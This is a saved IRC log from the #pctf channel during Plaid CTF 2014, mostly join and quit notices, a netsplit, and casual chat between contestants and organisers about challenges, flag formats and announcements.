  6052. (21:20:05) ••• qUit: (dedede) (d4293493@gateway/web/freenode/ip.212.41.52.147) Ping timeout: 240 seconds
  6053. (21:20:12) (kilmey) more hard than other webs here...
  6054. (21:22:40) (+tylerni7) I mean, it's more points too :)
  6055. (21:23:05) (kilmey) but only +100 :P
  6056. (21:23:05) ••• qUit: (naam) ([email protected]) Read error: Connection reset by peer
  6057. (21:24:37) (altf4) (╯°□°)╯︵ ┻━┻)
  6058. (21:24:41) ••• qUit: (livinded) ([email protected]) Ping timeout: 252 seconds
  6059. (21:24:43) (kilmey) eg.g web200 (kpop) tooks about 15-20 minutes to solve it
  6060. (21:24:54) (kilmey) eg. *took
  6061. (21:25:31) (kilmey) reekee was pretty harder, but still not as hard as whatscat )
  6062. (21:25:41) ••• jOin: (albntomat0) (8c201003@gateway/web/freenode/ip.140.32.16.3)
  6063. (21:25:46) ••• jOin: (chunderstruck1) ([email protected])
  6064. (21:26:59) (kilmey) tylerni7: who's the author?
  6065. (21:27:06) (+tylerni7) me
  6066. (21:27:18) ••• qUit: (eastwolf_) ([email protected]) Ping timeout: 250 seconds
  6067. (21:27:20) (kilmey) ok to pm?
  6068. (21:27:26) (+tylerni7) sure :)
  6069. (21:27:33) ••• qUit: (makler2004) ([email protected]) Remote host closed the connection
  6070. (21:27:59) (kmowery) pro tip: if you mean q, don't type p
  6071. (21:29:20) ••• jOin: (deder) (d4293493@gateway/web/freenode/ip.212.41.52.147)
  6072. (21:29:51) ••• jOin: (cmplxen) (~cmplxen@unaffiliated/cmplxen)
  6073. (21:30:07) ••• qUit: (netsurf3) ([email protected]) Ping timeout: 258 seconds
  6074. (21:32:25) ••• jOin: (BinaryCrystal) ([email protected])
  6075. (21:32:36) (BinaryCrystal) is the user ppp in use?
  6076. (21:32:41) ••• qUit: (chrissing) ([email protected]) Remote host closed the connection
  6077. (21:32:57) (+frozencemetery) probably; it's a big network
  6078. (21:32:58) (BinaryCrystal) for ssh?
  6079. (21:33:24) ••• jOin: (netsurf3) ([email protected])
  6080. (21:34:05) ••• qUit: (cmplxen) (~cmplxen@unaffiliated/cmplxen) Client Quit
  6081. (21:35:12) ••• qUit: (cool_guy) ([email protected]) Ping timeout: 276 seconds
  6082. (21:35:42) ••• jOin: (Comrade_Badger) ([email protected])
  6083. (21:37:50) ••• jOin: (lkajfpoa) ([email protected])
  6084. (21:38:28) ••• qUit: (kilmey) (5775c785@gateway/web/freenode/ip.87.117.199.133) Quit: Page closed
  6085. (21:39:45) (arthurdent) BinaryCrystal: ssh?
  6086. (21:39:45) ••• qUit: (vap0r) (d06bcefc@gateway/web/freenode/ip.208.107.206.252) Quit: Page closed
  6087. (21:40:01) ••• jOin: (naam) ([email protected])
  6088. (21:42:08) (namrog84) for the pwnables and ones with ip/ports, what am i supposed to connect to them with? or is that part of the challenge?
  6089. (21:42:18) (tomcr00se) a web browser
  6090. (21:42:40) (+clockish) namrog84: a tcp connection, e.g. "nc xx.xx.xx.xx port"
  6091. (21:42:41) (namrog84) i mean like tenement (100pt) 54.237.240.143:9999 web browser doesnt work
  6092. (21:42:49) (namrog84) oh ok, thanks thats what i was looking for
  6093. (21:42:59) (namrog84) aha! that worked, thanks lots
  6094. (21:43:00) ••• qUit: (naam) ([email protected]) Read error: Connection reset by peer
  6095. (21:43:04) • +ricky debates between releasing his cool problem now or saving it for next year
  6096. (21:43:21) (dct1) I connect with a toaster
  6097. (21:43:23) (+frozencemetery) ricky: RELEASE THE KRAKEN
  6098. (21:43:26) ••• jOin: (naam) ([email protected])
  6099. (21:43:48) (+ricky) Yeah, on one hand I don't want to waste it by having nobody solve it (like almost 50% of my past pctf challenges)
  6100. (21:43:52) (+ricky) On the other hand it's my only problem this year
  6101. (21:44:02) (_blasty_) :-X
  6102. (21:44:49) ••• qUit: (netsurf3) ([email protected]) Ping timeout: 245 seconds
  6103. (21:45:46) ••• jOin: (netsurf3) ([email protected])
  6104. (21:45:52) (+ricky) Hmmmm....
  6105. (21:46:08) (+ricky) Yeah, and it sucks for the people who are sleeping to release something halfway in
  6106. (21:46:18) (+ricky) Well sometihng long at least
  6107. (21:47:17) (nopple) ricky: as long as it's not x64 c++ :)
  6108. (21:47:32) (nopple) ricky: or at least worth enough points for the effort
  6109. (21:48:01) (x56) if it's like usbdude last year, bring it on :D
  6110. (21:48:07) (+tylerni7) it would be worth quite a few points
  6111. (21:48:12) (x56) would love some AVR
  6112. (21:48:12) (+clockish) nopple: ...
  6113. (21:48:15) (x56) ARM, MIPS
  6114. (21:48:16) (x56) w/e
  6115. (21:48:35) ••• qUit: (naam) ([email protected]) Ping timeout: 240 seconds
  6116. (21:48:37) (nopple) clockish: ;)
  6117. (21:48:38) (+clockish) nopple: we'll it'd be worth enough points :P
  6118. (21:49:11) ••• jOin: (pctf663) (81f4f232@gateway/web/freenode/ip.129.244.242.50)
  6119. (21:49:24) ••• qUit: (trelgak) ([email protected]) Ping timeout: 240 seconds
  6120. (21:49:51) ••• jOin: (xman) (0ea122c5@gateway/web/freenode/ip.14.161.34.197)
  6121. (21:50:22) ••• qUit: (lkajfpoa) ([email protected]) Quit: Http://www.ZeroIRC.NET ¢Æ Zero IRC ¢Æ Ver 2.9G
  6122. (21:50:29) ••• jOin: (phiber__) ([email protected])
  6123. (21:50:39) ••• qUit: ([CISSP]m1thieu) ([email protected]) Ping timeout: 245 seconds
  6124. (21:52:32) (xman) hello any op?
  6125. (21:53:09) (arthurdent) slarks op
  6126. (21:53:23) ••• qUit: (phiber_) ([email protected]) Ping timeout: 240 seconds
  6127. (21:53:25) ••• jOin: (lkwpeter) ([email protected])
  6128. (21:53:41) ••• jOin: (chrissing) ([email protected])
  6129. (21:53:42) (lkwpeter) who can i pm for mtpox ?
  6130. (21:53:56) (+tylerni7) lkwpeter: you can pm me
  6131. (21:54:01) (+tylerni7) xman: I am op
  6132. (21:54:58) ••• jOin: ([ToH]rbino) ([email protected])
  6133. (21:56:57) ••• qUit: ([pwn]poizan42) ([email protected]) Ping timeout: 258 seconds
  6134. (21:57:07) ••• qUit: (pez) ([email protected]) Quit: WeeChat 0.4.3
  6135. (21:57:30) (+ricky) nopple: I think the points would be worth the effort :-P
  6136. (21:58:27) ••• qUit: (lkwpeter) ([email protected]) Read error: Connection reset by peer
  6137. (21:58:30) ([ToH]rbino) in which format is the flag for crypto200?
  6138. (21:58:36) (pipecork) clockish: this js is great. bravo
  6139. (21:59:10) ••• qUit: (chrissing) ([email protected]) Remote host closed the connection
  6140. (21:59:42) ••• qUit: (Stean) ([email protected]) Quit: Leaving.
  6141. (21:59:42) (+clockish) pipecork: i are a js mastar!
  6142. (21:59:55) ••• qUit: (woot_) (83c2fd17@gateway/web/freenode/ip.131.194.253.23) Quit: Page closed
  6143. (22:00:00) (ebeip90) i have it on good authority that clockish has no idea what he's doing >_>
  6144. (22:00:11) (+frozencemetery) #rekt
  6145. (22:00:25) ••• jOin: (Stean) ([email protected])
  6146. (22:00:47) (+clockish) :3
  6147. (22:00:51) ••• jOin: (cool_guy) ([email protected])
  6148. (22:01:08) ••• qUit: (Stean) ([email protected]) Client Quit
  6149. (22:01:30) ••• jOin: (fasmotol) ([email protected])
  6150. (22:03:34) ••• jOin: (codequaid) ([email protected])
  6151. (22:03:37) ••• jOin: (hadahash) (uid25580@gateway/web/irccloud.com/x-wsnoahgwqigwbhij)
  6152. (22:04:53) (fasmotol) Can someone tip in what linux can i launch pwn100 without getting 'error while loading shared libraries: libseccomp.so.2: cannot open shared object file: No such file or directory'. i cannot fix this issue
  6153. (22:06:01) (fuzyll) fasmotol: what shared library are you missing, based on that error message?
  6154. (22:06:36) ••• qUit: (Zoro) (328200f8@gateway/web/freenode/ip.50.130.0.248) Ping timeout: 240 seconds
  6155. (22:06:46) (codequaid) Could someone give me a tip on reekee? I can't figure out the path to settings.py on the target machine, but i have everything else figured out.
  6156. (22:07:12) (+tylerni7) codequaid: it can be found, deterministically with 0 guessing
  6157. (22:07:14) • +tylerni7 shrugs
  6158. (22:07:23) (+tylerni7) and you should pm for things like this
  6159. (22:07:27) (+tylerni7) not mention in main channel :)
  6160. (22:09:14) (solo_) 0xffa == eindbazen?
  6161. (22:11:06) ••• qUit: (xman) (0ea122c5@gateway/web/freenode/ip.14.161.34.197) Ping timeout: 240 seconds
  6162. (22:11:06) ••• jOin: (eastwolf_) (ad42d345@gateway/web/freenode/ip.173.66.211.69)
  6163. (22:11:49) (hadahash) hi, any flag format i should know of?
  6164. (22:12:09) (+tylerni7) hadahash: try with everything you see
  6165. (22:12:12) (+tylerni7) including pctf{} and flag{}
  6166. (22:12:16) (+tylerni7) if you don't see this, don't include it
  6167. (22:12:18) ••• qUit: (muchacho) ([email protected]) Ping timeout: 245 seconds
  6168. (22:12:50) (hadahash) tylerni7: ah, alright, thanks :)
  6169. (22:13:58) ••• qUit: (ronbarrey) ([email protected]) Ping timeout: 245 seconds
  6170. (22:14:02) ••• jOin: ([SH]mom) ([email protected])
  6171. (22:14:38) ••• jOin: (ronbarrey) ([email protected])
  6172. (22:15:37) (supersat) can I ping someone about web150 before I go on a wild goose chase?
  6173. (22:15:50) (supersat) aka mtpox
  6174. (22:16:29) (+tylerni7) supersat: pm me
  6175. (22:16:52) ••• jOin: (gut) ([email protected])
  6176. (22:16:57) ([SH]mom) Is rendezvous currently working as intended?
  6177. (22:17:08) ••• jOin: (trelgak) ([email protected])
  6178. (22:17:23) (deder) i want to sleep
  6179. (22:17:30) (+frozencemetery) [SH]mom: yes
  6180. (22:17:33) (Adran) sleep challenge
  6181. (22:17:38) (deder) hye
  6182. (22:17:40) (+dickoff) sleep is good
  6183. (22:17:41) (deder) ye
  6184. (22:18:19) (+frozencemetery) sleep(5)
  6185. (22:18:47) ••• jOin: (eastwolf__) ([email protected])
  6186. (22:18:47) (ronbarrey) any1 got any suggestions for multiplication is hard?
  6187. (22:19:17) (ronbarrey) also stuck on admin.php for web150
  6188. (22:19:46) (dct1) What time does the ctf officially end?
  6189. (22:19:59) (+houqp) [SH]mom: yes
  6190. (22:19:59) (arthurdent) 5pm EST tomorrow iirc
  6191. (22:20:12) ••• qUit: (phiber__) ([email protected]) Read error: Connection reset by peer
  6192. (22:20:15) (+tylerni7) yep 5pm EST
  6193. (22:20:18) (Adran) tylerni7: mind if I see if i am on the right track for mtpox?
  6194. (22:20:20) (dct1) gracias
  6195. (22:20:28) (ronbarrey) sure
  6196. (22:20:33) (+tylerni7) Adran: you can pm me and ask
  6197. (22:20:34) (+houqp) [SH]mom: pm me if you think you think you have the correct solution, but not getting the flag
  6198. (22:21:51) ••• qUit: (PHLAK) ([email protected]) Changing host
  6199. (22:21:52) ••• jOin: (PHLAK) (~chris@unaffiliated/phlak)
  6200. (22:27:26) ••• qUit: (trelgak) ([email protected]) Read error: Connection reset by peer
  6201. (22:31:49) ••• jOin: (naam) ([email protected])
  6202. (22:33:16) ••• iNfo: These users have been split from (#pctf): poppopret, irdan, hellok, nurfed_, Valion_, Atlantic777, zoomequipd, dudes, gsilvis_, ricky, xyrex, WhizzMan, BrianWGray, kmowery, ChanServ, hasB4K, maikol, marc-etienne, thecatbot, [pwn]haabb, fser, upb, albntomat0, slipper, lanjelot, schrodinger, colona, x56, houqp, duper, ysje, _joeje_, eastwolf_, Redford, Im11Plus1, khloe, Phshap, [NULLify]Chaplin, tweek_, j8, marcan, ius, Im11Plus, brogle, ylujion, awesie, brambit_, zedsdeadbaby, nbdy, ryan-c, nadar, ktrask, atem, jduck, [hfs]capsl, awe, Nothingness, Valodim, Yerer, pnX, stach, phish51, sh8, LuckyY, mathiasbynens, SLAZ, [SH]mom, pcc7, pd7, computerality, alexwebr, pctf663, chuckleberry, auscompgeek, lavish, deder, whois, alvoha, abcert, dunamis, moki, jmgrosen, bata, eastwolf__, dkohlbre, sven, saelo, netsurf3, audioPhil, espes__, Barbara_Tracy, q3k, altf4, hellman, Amnesia, talanor, tyage, morla, dnivra, wapiflap1, soleblaze, j00ru, chunderstruck1, DrunkenPanda, Gynvael, blankwall, clockish, bs`, HeadHunter, haoz, Xor0X, zardus, allanlw, hoxy, dwn, kurti, Tokage-Kira, EdHunter, Apple_Eater, piroko, KT, dbuq, larsan, psifertex, mserrano, rvpersie, atdog, neodyblue, cychao, javex, PHLAK, kevin``, synthverity, depierre, adam_i, sqrts|stephan, pctf_scoreboard, [ToH]rbino, plo, bool_101, duckyTS, handlr, wyatt_earp, Pitr_, Lopi, hbw, suto_, [pwn]TM, mak`, gpp, robbje, acez, Otacon22, HENLEYbls, choppers, l0l0l, cybercybercyber, [int3]romansoft, dim_maK, cd1zz, ari_, NotoriousHUB, fixception, _275o, plaintext, fasmotol, k00mi, asby, [euronop]skab, kereoz, guy_, Kasalehlia, Cimmi, Comrade_Badger, epochtato, namrog84, thomakj, architekt, mike_pizza, akiym_, tylerni7, Fireghost, s_kunk, ninjafish, kalenz, xp45g, Galactic, RyanWithZombies, kiwhacks, kurtisebear, Aristokratov, warrick, asmoday, BiDOrD, mrsmith67, mak, snoopybbt, erye, cool_guy, knuckles, dzeta, spectralsun, mongo12, Holographic, dwlewis, nUl1, nofiki1, g0tmi1k, bobsteam, supersat, HighFiveBell, dickoff, zoidberg-, dct1, _ML, nopple, marcoscars02, f00b4r_, nopnopgo1se, synick, criple_ripper, almac, jix, cai_, Yolanda, majuscule, comawill, saxx, ronbarrey, dcbz_, jarCrack, BinaryCrystal, a5m0, frozencemetery, arthurdent, NK_, X-N2O_, Nanomebia, osandov, grimmlin_, ircc3, whos_tyler, torvos, o1e6, isra17, codequaid, c671m, oldtopman, Lympho|DrgnS, smd, tomcr00se, dropkick_, factoreal, [2]Knight, jjk_, wonder-defbra, briezer, TobalJackson, zoku, DKay, fester, ebeip90, wmliang_, _bcc, xichzo, WuZ, skier_, haakjes, danitorwS, maurer, Reinhart, Adrastei, Yen1, devotchka, ikari, pipecork, nope_, nagi_, dave5623, toxickappa, mischa__, OwariDa, jinblack, Matir, Sin__, tsuro, qll, solo_, _blasty_, connection, abuss, MavJS - check netsplits window for details!
  6203. (22:39:14) ••• qUit: (shadghost) ([email protected]) Write error: Broken pipe
  6204. (22:39:14) ••• qUit: (PoopyPantsSr) ([email protected]) Write error: Broken pipe
  6205. (22:39:16) (stypr) wow
  6206. (22:39:20) (stypr) splitsplitsplit
  6207. (22:39:29) ••• qUit: (Adran) (adran@botters/staff/adran) Quit: Este é o fim.
  6208. (22:39:29) ••• qUit: (jgor) ([email protected]) Remote host closed the connection
  6209. (22:39:29) ••• qUit: (spq) ([email protected]) Remote host closed the connection
  6210. (22:39:29) ••• qUit: (xorrbit) ([email protected]) Remote host closed the connection
  6211. (22:39:37) ••• iNfo: These users have rejoined (#pctf): cai_ - check netsplits window for details!
  6212. (22:39:40) ••• jOin: (PoopyPantsSr) ([email protected])
  6213. (22:41:28) ••• jOin: (x7r0n) (x7r0n@2002:75fe:6b04::75fe:6b04)
  6214. (22:41:34) ••• qUit: (Dumpling) ([email protected]) Ping timeout: 264 seconds
  6215. (22:43:07) (stypr) that damn javascript
  6216. (22:43:11) (stypr) i mean nodeja
  6217. (22:43:14) (stypr) nodejs*
  6218. (22:44:24) ••• iNfo: These users have rejoined (#pctf): epochtato - check netsplits window for details!
  6219. (22:46:16) ••• qUit: (arthurdent) ([email protected]) Client Quit
  6220. (22:46:31) ••• iNfo: These users have rejoined (#pctf): arthurdent - check netsplits window for details!
  6221. (22:47:39) ••• qUit: (iago-x86) ([email protected]) Quit: sneaks out
  6222. (22:48:38) ••• qUit: (cai_) (~cai_@2001:19f0:1604:3ede:250:56ff:feae:66de) Quit: Bye
  6223. (22:48:59) ••• jOin: (cai_) (~cai_@2001:19f0:1604:3ede:250:56ff:feae:66de)
  6224. (22:49:11) ••• jOin: (arthurdent) ([email protected])
  6225. (22:51:16) ••• jOin: (nodocify) ([email protected])
  6226. (22:51:30) ••• qUit: (arthurdent) ([email protected]) Client Quit
  6227. (22:53:56) ••• iNfo: These users have rejoined (#pctf): Sin__ - check netsplits window for details!
  6228. (22:54:45) ••• jOin: (arthurdent) ([email protected])
  6229. (22:58:53) ••• qUit: (cai_) (~cai_@2001:19f0:1604:3ede:250:56ff:feae:66de) Quit: Bye
  6230. (22:59:49) ••• qUit: (gut) ([email protected]) Quit: Textual IRC Client: www.textualapp.com
  6231. (23:01:21) ••• qUit: (naam) ([email protected]) Ping timeout: 258 seconds
  6232. (23:10:09) ••• jOin: (z0) ([email protected])
  6233. (23:10:27) ••• nIck: (z0) is now known as (awesie)
  6234. (23:10:28) (awesie) if you want active help on irc, please join sendak.freenode.net and follow @PlaidCTF
  6235. (23:10:44) (awesie) PSA from the why-does-freenode-break-during-pctf department
  6236. (23:11:01) ••• qUit: (arthurdent) ([email protected]) Quit: arthurdent
  6237. (23:11:13) ••• qUit: (nodocify) ([email protected]) Quit: Leaving
  6238. (23:13:39) (x7r0n) 2048 bit rsa for forensics ? how am i gonna crack it :-(
  6239. (23:15:09) (awesie) x7r0n: if you want active help on irc, please join sendak.freenode.net
  6240. (23:21:24) (x7r0n) is it official pctf channel @awesie
  6241. (23:21:50) (x7r0n) i thot this was official channel
  6242. (23:22:20) ••• qUit: (AnthraX101) ([email protected])
  6243. (23:22:30) (x7r0n) btw any1 whom i can ping about forensics250
  6244. (23:22:43) ••• jOin: (AnthraX101) ([email protected])
  6245. (23:22:44) (awesie) x7r0n: freenode netsplit
  6246. (23:22:46) ••• qUit: (Sin__) ([email protected]) Quit: Sin__
  6247. (23:22:55) (awesie) so there are now 8 different #pctf channels
  6248. (23:23:02) (awesie) rather than the 1 that used to exist
  6249. (23:23:26) (awesie) if you checked twitter (@PlaidCTF), we are asking people to join irc://sendak.freenode.net/pctf
  6250. (23:24:29) * Disconnected
  6251. Session Close: Sat Apr 12 23:24:30 2014
  6252. Session Start: Sat Apr 12 23:24:30 2014
  6253. Session Ident: #pctf
  6254. (23:24:32) ••• rAw (0) LS account-notify extended-join identify-msg multi-prefix sasl
  6255. (23:24:32) ••• rAw (0) ACK multi-prefix
  6256. (23:24:33) ••• rAw (265) 6290 7379 Current local users 6290, max 7379
  6257. (23:24:33) ••• rAw (266) 6290 95150 Current global users 6290, max 95150
  6258. (23:24:33) ••• rAw (250) Highest connection count: 7380 (7379 clients) (181378 connections received)
  6259. (23:24:34) * Attempting to rejoin channel #pctf
  6260. (23:24:40) ••••••••••••••••••••••••••••••••••••••••• ••••• ••• •• •• •• • •
  6261. (23:24:40) ••• jOined: (#pctf)
  6262. (23:24:40) ••••••••••••••••••••••••••••••••••••••••• ••••• ••• •• •• •• • •
  6263. (23:24:40) ••• tOpic: ([Plaid CTF 2014 - play.plaidctf.com] 24 Hours left | $20 added to each cash prizes so far (from CHANCE card))
  6264. (23:24:40) ••• sEt by: (cai_!~cai_@2001:19f0:1604:3ede:250:56ff:feae:66de) on (Saturday, April 12th 2014, 16:41:38)
  6265. (23:24:40) ••• uSers: 48 users, 0 ops (0%), 2 voiced (4%), 46 regulars (96%)
  6266. (23:24:40) ••• sYnc time: (0.06) second(s)
  6267. (23:24:40) ••••••••••••••••••••••••••••••••••••••••• ••••• ••• •• •• •• • •
  6268. (23:25:16) ••• jOin: (delusions) ([email protected])
  6269. (23:26:07) ••• qUit: (nodocify) ([email protected]) Quit: Leaving
  6270. (23:26:54) (ricky) ANNOUNCE: The SQL injection in the ponies site was unintentional - it has been removed.
  6271. (23:27:17) (ricky) ANNOUNCE: SQL injection doesn't actually help you get anywhere on the problem, so people who found it didn't get any advantage
  6272. (23:27:23) (ricky) ANNOUNCE: Sorry for the inconvenience
  6273. (23:28:02) ••• jOin: (vladum_) ([email protected])
  6274. (23:28:12) (|x_x|) aww....
  6275. (23:29:05) ••• iNfo: These users have rejoined (#pctf): jmgrosen - check netsplits window for details!
  6276. (23:29:17) (inter) CLOCKISH
  6277. (23:29:18) (inter) YOU
  6278. (23:29:23) (inter) c
  6279. (23:30:55) ••• jOin: (x7r0n) ([email protected])
  6280. (23:32:59) (x7r0n) whom can i ask about forensics250 ?
  6281. (23:33:04) (x7r0n) i have few doubts
  6282. (23:33:09) (x7r0n) curlcore
  6283. (23:35:12) ••• jOin: (vap0r) ([email protected])
  6284. (23:36:19) (ricky) Would be interested in hearing if anybody finds anything else interesting with bronies :-P
  6285. (23:37:47) (x7r0n) tylerni7 u der ?
  6286. (23:38:04) (ricky) I think tylerni7 is sleeping
  6287. (23:38:17) (clockish) x7r0n I can answer
  6288. (23:38:21) (clockish) pm
  6289. (23:39:26) (x7r0n) ty :-)
  6290. (23:39:46) ••• jOin: (sibios) ([email protected])
  6291. (23:39:53) ••• qUit: (inter) ([email protected]) Quit: HydraIRC -> http://www.hydrairc.com <- Chicks dig it
  6292. (23:45:00) ••• jOin: (stypr_irc) (sid16290@gateway/web/irccloud.com/session)
  6293. (23:45:16) ••• nIck: (stypr_irc) is now known as (stypr_irccloud)
  6294. (23:49:03) ••• qUit: (c671m) ([email protected]) Quit: Reconnecting
  6295. (23:51:21) ••• jOin: (Brooklynt_Overfl) ([email protected])
  6296. (23:52:22) (ricky) IPs that are banned for path brute forcing: 46.0.46.243, 140.112.4.192
  6297. (23:52:31) (ricky) Please contact if you want to stop doing that and get unbanned
  6298. (23:54:11) ••• qUit: (x7r0n) ([email protected]) Quit: Leaving
  6299. (23:54:23) ••• qUit: (jmgrosen) ([email protected]) Quit: ERC Version 5.3 (IRC client for Emacs)
  6300. (23:56:00) ••• jOin: (knog) ([email protected])
  6301. (23:56:09) ••• jOin: (jmgrosen) ([email protected])
  6302. (23:56:14) (ricky) ANNOUNCE: /server-status is also not relevant to solving bronies
  6303. (23:56:48) (jmgrosen) gaaaah
  6304. (23:56:55) (jmgrosen) I'm tearing my hair out on kpop by now
  6305. (23:57:16) ••• pArt: (knog) ([email protected])
  6306. (23:58:13) (ricky) jmgrosen: Try bronies on for size :-P
  6307. (23:58:20) (ricky) It's a fantastic problem in my totally nonbiased opinion
  6308. (23:58:34) (jmgrosen) ricky: hm, wonder who wrote that one...
  6309. (23:58:34) ••• qUit: (duckyTS) ([email protected]) Read error: Connection reset by peer
  6310. (23:58:48) (houqp_) jmgrosen: mserrano
  6311. (23:59:04) (jmgrosen) my hypothesis was wrong, then :P
  6312. (23:59:51) (ricky) (houqp_ is kidding :-P)
  6313. (00:00:00) ••• iNfo: Day changed to (Sunday, April 13th 2014).
  6314. Session Time: Sun Apr 13 00:00:00 2014
  6315. (00:00:03) (ricky) Though this problem did have input from both tylerni7 and awesie_
  6316. (00:00:21) (jmgrosen) ah
  6317. (00:00:30) (jmgrosen) my sarcasm-over-irc detecter must be broken
  6318. (00:00:47) ••• jOin: (dnivra) ([email protected])
  6319. (00:01:31) ••• nIck: (dnivra) is now known as (dnivra_)
  6320. (00:01:42) ••• jOin: (duckyTS) ([email protected])
  6321. (00:03:23) (sibios) ricky, quick question RE:bronies. Can I pm?
  6322. (00:03:34) (ricky) sibios: Yup feel free to pm
  6323. (00:04:08) ••• jOin: (Fancy18) ([email protected])
  6324. (00:04:10) (Fancy18) Here some videos. I hope you like them! http://bit.ly/1gAh6Jy
  6325. (00:04:27) (ricky) ^spammmmm
  6326. (00:04:51) ••• jOin: (hellman) ([email protected])
  6327. (00:04:52) (clockish) I LIKE SPAM
  6328. (00:05:02) (hellman) o/
  6329. (00:05:06) (clockish) hi hellman
  6330. (00:05:13) (stypr_irccloud) i hate pony
  6331. (00:05:20) ••• qUit: (Fancy18) ([email protected]) Read error: Connection reset by peer
  6332. (00:05:21) (stypr_irccloud) i think we *must* bruteforce.
  6333. (00:05:27) (clockish) stypr_irccloud: wrong
  6334. (00:06:08) ••• qUit: (dnivra_) ([email protected])
  6335. (00:06:17) ••• jOin: (knog) ([email protected])
  6336. (00:06:32) (hellman) open the last crypto :(
  6337. (00:06:34) ••• jOin: (pd7) ([email protected])
  6338. (00:06:55) (pd7) tylerni7: you available?
  6339. (00:06:59) (ricky) ANNOUNCE: Just to clarify, both flags for bronies are behind the login page - the pony site doesn't have any flags in it
  6340. (00:07:01) ••• jOin: (rray) ([email protected])
  6341. (00:07:43) (pd7) or anyone that could point me in the right direction for mtpox
  6342. (00:07:45) (clockish) hellman: pwn harder first :P
  6343. (00:07:51) (pd7) I was able to get past the admin login
  6344. (00:07:57) (clockish) pd7: I can help with mtpox
  6345. (00:08:01) (ricky) Solve the wonderful web :-P I love web!
  6346. (00:08:06) (pd7) but I'm confused about what you're looking for as far as the key goes
  6347. (00:08:10) (pd7) clockish: can I pm you?
  6348. (00:08:14) (clockish) yes
  6349. (00:08:17) (pd7) thanks
  6350. (00:09:07) (iago-x86) Hmm @ harry_potter
  6351. (00:09:20) (iago-x86) Once again, seems more difficult than 150.. pwnage levels are hard. :)
  6352. (00:09:43) (ricky) Yeah, in retrospect, we probably undervalued it, sorry
  6353. (00:09:52) (ricky) My fault for that
  6354. (00:10:06) (iago-x86) Heh
  6355. (00:10:27) (iago-x86) It's one of those levels where I just plain don't know what to do.. I see the obvious vuln, but I don't think it's exploitable
  6356. (00:10:31) (iago-x86) I like the monkeys, though. :)
  6357. (00:14:12) (iago-x86) Woah, there's a Windows challenge!
  6358. (00:15:24) (ricky) Heh yeah, first one in ages
  6359. (00:15:31) (ricky) There's also an extra special web challenge
  6360. (00:15:35) (ricky) You should look at it :-P
  6361. (00:15:43) (ricky) It's very special
  6362. (00:15:44) ••• nIck: (monsi) is now known as (16WAAD756)
  6363. (00:15:45) ••• nIck: (sibios) is now known as (16WAAD8T9)
  6364. (00:15:46) ••• nIck: (clockish) is now known as (16WAAD7AR)
  6365. (00:15:46) ••• nIck: ([SH]mom) is now known as (16WAAD7CE)
  6366. (00:15:49) ••• nIck: (frozencemetery) is now known as (16WAAD67A)
  6367. (00:16:00) ••• jOin: (tomcr00se_) ([email protected])
  6368. (00:16:04) ••• jOin: (ius) ([email protected])
  6369. (00:16:04) ••• jOin: (xyrex) ([email protected])
  6370. (00:16:04) ••• jOin: (jjk_) (~jjk@2a01:4240:53f0:33b0::1)
  6371. (00:16:04) ••• jOin: (BiDOrD) ([email protected])
  6372. (00:16:04) ••• jOin: (upb) (cmpxchg@unaffiliated/upb)
  6373. (00:16:04) ••• jOin: (sh8) ([email protected])
  6374. (00:16:04) ••• jOin: (BrianWGray) (~BrianWGra@unaffiliated/brianwgray)
  6375. (00:16:04) ••• jOin: (suto_) ([email protected])
  6376. (00:16:04) ••• jOin: (j8) ([email protected])
  6377. (00:16:04) ••• jOin: (psifertex) (~psifertex@unaffiliated/psifertex)
  6378. (00:16:04) ••• jOin: (Valion_) ([email protected])
  6379. (00:16:05) ••• jOin: (marcan) ([email protected])
  6380. (00:16:05) ••• jOin: (phish51) ([email protected])
  6381. (00:16:05) ••• jOin: (hbw) ([email protected])
  6382. (00:16:05) ••• jOin: (auscompgeek) (aucg@firefox/community/auscompgeek)
  6383. (00:16:05) ••• jOin: (xp45g) ([email protected])
  6384. (00:16:05) ••• jOin: (Redford) ([email protected])
  6385. (00:16:05) ••• jOin: (frozencemetery) ([email protected])
  6386. (00:16:05) ••• jOin: (_bcc) ([email protected])
  6387. (00:16:05) ••• jOin: (nadar) ([email protected])
  6388. (00:16:05) ••• jOin: (Galactic) (~Galactic@unaffiliated/galactic)
  6389. (00:16:05) ••• jOin: ([2]Knight) ([email protected])
  6390. (00:16:05) ••• jOin: (cybercybercyber) ([email protected])
  6391. (00:16:05) ••• jOin: (Otacon22) ([email protected])
  6392. (00:16:05) ••• jOin: (Tokage-Kira) (uid15875@gateway/web/irccloud.com/x-adqrbntyqeceebtc)
  6393. (00:16:05) ••• jOin: (jgor) ([email protected])
  6394. (00:16:05) ••• jOin: (ikari) (~ikari@2001:1938:2e4::8)
  6395. (00:16:05) ••• jOin: (Yolanda) (uid29179@gateway/web/irccloud.com/x-hytlcbhzztqaifai)
  6396. (00:16:05) ••• jOin: (c1b3rh4ck) ([email protected])
  6397. (00:16:05) ••• jOin: (tomcr00se) ([email protected])
  6398. (00:16:05) ••• jOin: (Fireghost) ([email protected])
  6399. (00:16:05) ••• jOin: (awe) ([email protected])
  6400. (00:16:05) ••• jOin: (Pitr_) ([email protected])
  6401. (00:16:05) ••• jOin: ([euronop]skab) ([email protected])
  6402. (00:16:05) ••• jOin: (brambit_) ([email protected])
  6403. (00:16:05) ••• jOin: (kereoz) ([email protected])
  6404. (00:16:05) ••• jOin: (nopnopgo1se) ([email protected])
  6405. (00:16:05) ••• jOin: ([hfs]capsl) ([email protected])
  6406. (00:16:05) ••• jOin: (duper) ([email protected])
  6407. (00:16:05) ••• jOin: (Yen1) ([email protected])
  6408. (00:16:05) ••• jOin: (talanor) ([email protected])
  6409. (00:16:05) ••• jOin: (ryan-c) ([email protected])
  6410. (00:16:06) ••• jOin: (jduck) (~jdrake@metasploit/jduck)
  6411. (00:16:06) ••• jOin: (abuss) (~abuss@unaffiliated/abuss)
  6412. (00:16:06) ••• jOin: (espes__) ([email protected])
  6413. (00:16:06) ••• jOin: (kurti) (~kurti@unaffiliated/kurti)
  6414. (00:16:06) ••• jOin: (dim_maK) (mak@nat/dcunetworkingsociety/x-qcaddrzsnlktapac)
  6415. (00:16:06) ••• mOde: (sendak.freenode.net) sets (+v frozencemetery)
  6416. (00:16:06) ••• jOin: (guy_) (~guy@unaffiliated/guy/x-2189580)
  6417. (00:16:06) ••• jOin: (qll) (~qll@unaffiliated/qll)
  6418. (00:16:06) ••• jOin: (k00mi) ([email protected])
  6419. (00:16:06) ••• jOin: (fester) ([email protected])
  6420. (00:16:06) ••• jOin: (Xor0X) ([email protected])
  6421. (00:16:06) ••• jOin: (OwariDa) ([email protected])
  6422. (00:16:06) ••• jOin: (zoku) ([email protected])
  6423. (00:16:06) ••• jOin: (acez) ([email protected])
